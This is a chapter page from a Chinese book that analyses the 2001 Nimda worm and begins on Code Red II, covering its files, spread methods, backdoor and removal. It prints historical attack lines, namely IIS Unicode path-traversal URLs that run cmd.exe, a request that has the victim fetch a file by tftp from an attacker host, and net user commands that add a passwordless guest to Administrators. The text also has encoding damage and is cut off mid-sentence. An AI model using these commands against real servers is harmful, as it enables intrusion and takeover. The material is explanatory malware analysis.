知者无畏--一个真实的簿世界-第12章

小说：知者无畏--一个真实的簿世界字数：每页3500字

按键盘上方向键 ← 或 → 可快速上下翻页，按键盘上的 Enter 键可回到本书目录页，按键盘上方向键 ↑ 可回到本页顶部！
————未阅读完？加入书签已便下次继续阅读！

枨梢愿斓匿劳场�
安全漏洞，由于该病毒会打开硬盘的所有共享，并使任何用户使用guest帐号就可以登录到被感染的电脑上，这样会造成严重的安全漏洞，被感染电脑的重要信息、重要文件会被任何访问者轻易的获取。
guest帐号：在安全专家的眼中，Guest帐号是系统安全的恶梦，在一般基于口令的系统安全策略中，任何人登录到电脑上，需要一个用户名和一个口令，然后才可以访问相应的文件或者程序。为了在整个网络范围内提供一些大家可以随时访问的公共资源，一般系统都提供了一个guest帐号，使用这个用户名可以不需要口令就进入系统，如果guest帐号的权限是所有的硬盘、所有的权限（读、写、删除等等），你可以想象这对系统安全是一个多致命的打击。
经济损失，虽然尼姆达病毒不会实际的破坏硬盘或者数据，但是它采用的传播方式众多，占用大量的网络资源，更重要的是由于它所引起的安全漏洞，将使被感染的电脑必须停止服务并且彻底清除病毒（最稳妥的方法只有重新安装系统，而且还需要对所有的HTML页面进行清理），这种停止服务和重新安装软件的费用是巨大的，根据估计，截至到2001年8月24日，造成的经济损失已经超过5。3亿美元。
下面我们稍微深入地看一看这个被誉为“瑞士军刀”的病毒。
名称：　
下面这些名称都指的是尼姆达病毒：　
Wormncept。57344　
W32/Nimda。A@mm　
W32/Nimda@mm　
I…Worm。Nimda　
中国一号
受影响的系统：　
所有的Windows　32位平台，Windows　95；　Windows　98；　Windows　Me；　Windows　NT　4；　Windows　2000　
大小：　57344字节　
病毒文件：　
该病毒可能会以下面这些文件名存在，病毒的作者采用了很高明的隐蔽手法，这些文件都是实际系统中存在的，但是病毒将自己放在一个稍微不同的位置，这样你就很难注意到它的存在了（甚至包括我这样的专家，也弄不清微软自己的mmc。exe究竟应该放在windows的目录还是Windows下面的系统目录中）：
Windows目录、系统目录和临时目录：Windows目录就是你将Windows安装到的目录，对于Windows9x一般都是c：windows，或者其他硬盘上的windows目录，Windows2000是Winnt，如果你在安装时选择了其他目录，那么就是你安装时选择的目录。系统目录是Windows目录下的子目录，一般是WindowsSystem目录，如果是Windows　NT或者Windows2000，是Winntsystem32目录。临时目录是系统存放临时文件的地方，也是Windows目录下的子目录，一般是WindowsTemp目录。
mmc。exe：出现在windows文件夹，执行扫描和创建tftpd的进程就是它。注意windows系统目录里也有一个mmc。exe，这个mmc。exe是Windows本身就存在的，是微软管理控制台程序（Microsoft　Manage　Console），微软的一个管理程序。　
riched20。dll：riched20。dll除了出现在windows系统目录里，还可能出现在任何有*。doc文件的目录里。　Riched20。dll是进行文本编辑的一个动态连接库，因为它是winword。exe和wordpad。exe运行时都要调用的所以当打开DOC文件时就等于运行了尼姆达病毒。　
＇Admin。dll＇　Admin。dll除了在C：，D：，E：的根目录外还可出现在下面的〃TFTP*****〃出现的地方。　
＇load。exe＇　出现在windows系统目录，配合对system。ini的修改，可以保证在启动系统的时候，首先执行的是这个文件。
＇％temp％readme。exe＇，临时目录下面的readme。exe文件。
＇TFTP****＇　形如〃TFTP3233〃。文件位置取决于使用tftp的目录。如果是　〃GET　/scripts/root。exe？/c＋tftp　…i　＇本地IP地址＇　GET　Admin。dll　HTTP/1。0〃　那么位置就在〃Inetpubscripts”。如果是　〃GET　/scripts/。。％c1％1c。。/winnt/system32/cmd。exe？/c＋tftp　…i　＇本地IP地址＇　GET　Admin。dll　HTTP/1。0〃　那么位置就在〃/scripts/。。％c1％1c。。/〃也就是根目录。
％c1％1c？在浏览一个网页的时候，我们经常会看到这样一些以百分号开始的符号，实际上这是一些中文或者其他非西方文字的字符，很多老的标准是以英文字母为基础的，为了和这些软件兼容，在表示非西方字符的时候，就采用％数字＋％数字的方法表示下面是一个unicode的编码。
Unicode：Unicode　是一种重要的交互和显示的通用字符编码标准，它覆盖了美国、欧洲、中东、非洲、印度、亚洲和太平洋的语言，以及古文和专业符号。Unicode　允许交换、处理和显示多语言文本以及公用的专业和数学符号。它希望能够解决多语言的计算，如不同国家的字符标准，但并不是所有的现代或古文都能够获得支持，象中国文字，《康熙字典》收录的实际万汉字中。
Unicode　字符可以适用于所有已知的编码。Unicode　是继　ASCII（美国国家交互信息标准编码）字符码后的一种新字符编码，它用一个16位（两个字节）的数字编码一个字符。因此最多可以表示65536个字符。可以满足绝大多数现代语言字符数字化的需要。
＇readme。eml＇　这是一个邮件文件，这个巧妙的文件利用了IE5。01/IE5。5的一个重要漏洞（为什么微软的东西总有这么多的漏洞呢）。我们知道html格式的邮件中图片和多媒体文件都是自动打开的，而可执行文件不是。但如果把可执行文件指定为多媒体类型，也会自动下载打开。下面是readme。eml的一段代码：　
_ABC1234567890DEF_　
Content…Type：　audio/x…wav；　骗浏览器自己是一个音频文件！
name=〃readme。exe〃　
Content…Transfer…Encoding：　base64　
Content…ID：　
另外，如果文件夹是〃按web页查看〃（如果你把鼠标移动到一个文件上面的时候，显示的光标是一只手，那你就要小心了），那么即使只是用鼠标单击选中readme。eml也会导致蠕虫的执行，如果把扩展名改为mht也是可以的，但改为htm就不行。　
＇readme。nws＇　同readme。eml，只是出现的几率很小。　
＇*。exe＇　可执行文件被感染后，可能是任何文件名。　

传播方式：　
（一）通过电子邮件　，当用户收到邮件的正文为空，似乎没有附件，实际上邮件中嵌入了病毒的执行代码，当用户用OUTLOOK、OUTLOOK　EXPRESS（没有安装微软的补丁包的情况下）收邮件，在预览邮件时，病毒就已经不知不觉中执行了。病毒执行时会将自己复制到临时目录，再运行在临时目录中的副本。病毒还会在windows的system目录中生成load。exe文件，同时修改system。ini中的shell从shell=explorer。exe改为explorer。exe　load。exe　…dontrunold，使病毒在下次系统启动时仍然被激活。另外，在system目录下，病毒还会生成一个副本：riched20。dll。而riched20。dll目录在windows系统中就存在，而它就把它覆盖掉了。病毒执行之后，会在因特网临时文件夹中读取所有〃htm〃，〃html〃文件并从中提取电子邮件地址，　从信箱读取电子邮件地址并从中提取SMTP服务器，然后发送readme。eml，这可比仅仅通过outlook传播要厉害和隐蔽得多。　
（二）通过微软的unicode漏洞
在IIS　4。0和IIS　5。0在Unicode字符解码的实现中存在一个安全漏洞，导致用户可以远程通过IIS执行任意命令。当IIS打开文件时，如果该文件名包含unicode字符，它会对其进行解码，如果用户提供一些特殊的编码，将导致IIS错误的打开或者执行某些web根目录以外的文件。
　　对于IIS　5。0/4。0中文版，当IIS收到的URL请求的文件名中包含一个特殊的编码例如〃％c1％hh〃或者〃％c0％hh〃；它会首先将其解码变成：0xc10xhh，　然后尝试打开这个文件，Windows　系统认为0xc10xhh可能是unicode编码，因此它会首先将其解码，如果　0x00　（0xc1　…　0xc0）　*　0x40　＋　0xhh
％c0％hh　…》　（0xc0　…　0xc0）　*　0x40　＋　0xhh
　　因此，利用这种编码，我们可以构造很多字符，例如：
％c1％1c　…》　（0xc1　…　0xc0）　*　0x40　＋　0x1c　=　0x5c　=　'/'
％c0％2f　…》　（0xc0　…　0xc0）　*　0x40　＋　0x2f　=　0x2f　=　''
攻击者可以利用这个漏洞来绕过IIS的路径检查，去执行或者打开任意的文件。　
如果系统包含某个可执行目录，就可能执行任意系统命令。下面的URL可能
列出当前目录的内容：
victim/scripts/。。％c1％1c。。/winnt/system32/cmd。exe？/c＋dir
利用这个漏洞查看系统文件内容也是可能的：
victim/a。asp/。。％c1％1c。。/。。％c1％1c。。/winnt/win。ini
（三）通过红色代码二代建立的root。exe　
红色代码二代会在IIS的几个可执行目录下放置root。exe　
也是尽人皆知，Nimda首先在udp/69上启动一个tftp服务器　
然后会作以下扫描　

一旦发现有弱点的系统就使用类似下面的命令　
GET　/scripts/root。exe？/c＋tftp　…i　xxx。xxx。xxx。xxx　GET　Admin。dll　HTTP/1。0　
把文件传到主机上去，然后再GET　/scripts/Admin。dll　HTTP/1。0　
（四）通过WWW服务　在所有文件名中包含default/index/main/readme并且扩展名为htm/html/asp的文件　所在目录中创建readme。eml，并在文件末加上下面这一行　window。open（〃readme。eml〃；　null；　〃resizable=no；top=6000；left=6000〃）　
也就是说如果一台web服务器被感染了，那么大部分访问过此服务器的机器都会被感染。　
（五）通过局域网　
Nimda会搜索本地的共享目录中包含doc文件的目录，一但找到，就会把自身复制到目录中命名为riched20。dll（原理见前）　
（六）以病毒的方式　
搜索＇SOFTWAREMicrosoftWindowsCurrentVersionApp　Paths＇寻找在远程主机上的可执行文件，　一旦找到，Nimda就会以病毒的方式感染文件。有一点不同的是，它把原文件作为资源存储在新文件中，　运行新文件时再当作可执行文件来调用。奇怪的是Nimda过滤了winzip32。exe，它不会感染winzip32。exe，　应该是作者发现winzip染毒后不能正常运行，就过滤掉这个使用最为广泛的压缩程序。　

如何运行的：　
病毒采取以下措施确保自己在系统一开机之后就运行：
1）把自己复制到windows系统文件夹里命名为riched20。dll（原理见前）　
2）把自己复制到windows系统文件夹里命名为load。exe，　
修改system。ini把　
shell=explorer。exe改为　
shell=explorer。exe　load。exe　…dontrunold　
使病毒在下次系统启动时运行。　

安全灾难—创建后门：　
1）　如果有足够权限将调用〃net。exe〃执行以下系统命令：　
net　user　guest　/add　增加一个guest用户
net　user　guest　/active 激活guest用户
net　user　guest　〃〃　 guest用户的密码为空
net　localgroup　Administrators　guest　将guest加到管理员组中！太可怕了。
net　localgroup　Guests　guest　/add　
结果是空密码的guest加到了Administrators组中。　

2）如果有足够权限将调用〃net。exe〃执行以下系统命令：　
net　share　c=c：　
删除＇SYSTEMCurrentControlSetServiceslanmanserverSharesSecurity＇的所有子键　
结果是C：设为完全共享。　

作者是谁？　
程序的作者在程序中留下了以下标记：　
fsdhqherwqi2001　
Concept　Virus（CV）　V。5；　Copyright（C）2001　R。P。China　
可能对最终找出作者有帮助。　
从这些信息来看，似乎作者来自中国，但是在作者没有站出来承认之前，这些文字可以使任何人加在病毒代码里的。

为什么说尼姆达是〃概念〃蠕虫？　
它可以通过至少六种方式传播　
它是一个带exe扩展名的dll，可以做为可执行文件运行，也可作为dll运行。　
它有智慧：当它名为Admin。dll被运行时，它会把自己复制到windows文件夹命名为mmc。exe并带上参数〃…qusery9bnow〃运行。　
当它名为readme。exe被运行时，它会把自己复制到％temp％带上参数〃…dontrunold〃运行。　
它会把自己的属性设为〃系统〃〃隐藏〃，再改写注册表，使〃系统〃〃隐藏〃属性的程序在资源管理器中不可见。　
它是一个主机扫描器，一个弱点扫描器，一个后门程序；带有多个漏洞，掌握最新的安全信息；它就是一个黑客，人们把它称为“瑞士军刀”不是没有道理的。　

如何清除尼姆达病毒？　
在文件夹选项里设置〃显示所有文件〃　
删除mmc。exe/load。exe/riched20。dll/admin。dll/readme。eml/readme。exe等所有蠕虫文件。　
从原始安装盘中提取riched20。dll覆盖windows系统文件夹里的同名蠕虫文件。　
检查所有大小为57344或79225的文件。　
可以使用〃查找〃工具，搜索包含〃fsdhqherwqi2001〃的*。exe/*。dll和包含〃Kz29vb29oWsrLPh4eisrPb09Pb2〃的*。eml/*。nws。　
检查system。ini，去掉自动执行load。exe文件的行。　
检查所有文件名中包含default/index/main/readme并且扩展名为htm/html/asp的文件。　
删除C：的共享　
重起系统　

如何避免Nimda入侵？

根本之道是打补丁：　
Unicode漏洞：microsoft/technet/security/bulletin/ms00…078。asp　
MIME漏洞：microsoft/technet/security/bulletin/ms01…020。asp　
IE5。01　SP2：microsoft/windows/ie/downloads/remended/ie501sp2/default。asp　
IE5。5　SP2：microsoft/windows/ie/downloads/remended/ie501sp2/default。asp　

其他解决方案：　
打开IE的〃工具》internet选项》安全》自定义级别》文件下载〃选〃禁用〃。　
删除所有不需要的默认虚拟目录，或者只给纯脚本执行权，最好不要把任何web目录放在系统分区。　
检查共享设置，Win9X的机器不要开完全共享，可以开只读共享，所有共享都要设置口令。　由于尼姆达可以利用红色代码二代创建的后门，所以需打上针对红色代码二代的补丁，
检查C：和D：　有没有explorer。exe，检查web目录中有没有root。exe。　
第二节　红色代码是红色的吗？
你知道吗，在“红色代码”流行之前，已经出现过“绿色代码”，而在“红色代码”之后，又出现了“蓝色代码”，这些五颜六色的东西的出现，仿佛宣告电脑病毒已经成为一种时尚，就像穿衣服有流行色一样，似乎病毒也有了自己的流行色。
实际上，从某种意义上，杀毒软件厂商对一种病毒进行分析之后，将其命名为“绿色代码”应该是引导这场时尚的先锋，因为这种命名，病毒作者故意在新的病毒里面包括了类似“Code　Red”之类的字符，让病毒的发现者命名它为“红色代码”，病毒和反病毒共同引导了这场颜色的革命。
红色代码有一代和二代两种，我们重点分析二代：
红色代码二代于2001年8月首次发现，它是“红色代码”病毒的一个变种。　
和“红色代码”一样，它也是利用缓冲区溢出传播到其他web服务器。由于收到了大量的因特网信息服务器（IIS　Server）被感染的报告。我们把“红色代码二代”定为高度危险。
最早的“红色代码”曾经成功的攻击了白宫的主页，导致其拒绝服务。更进一步，“红色代码二代”可以使黑客在远程取得对服�

返回目录上一页下一页回到顶部赞（0）踩（0）

第12章

知者无畏--一个真实的簿世界-第12章

你可能喜欢的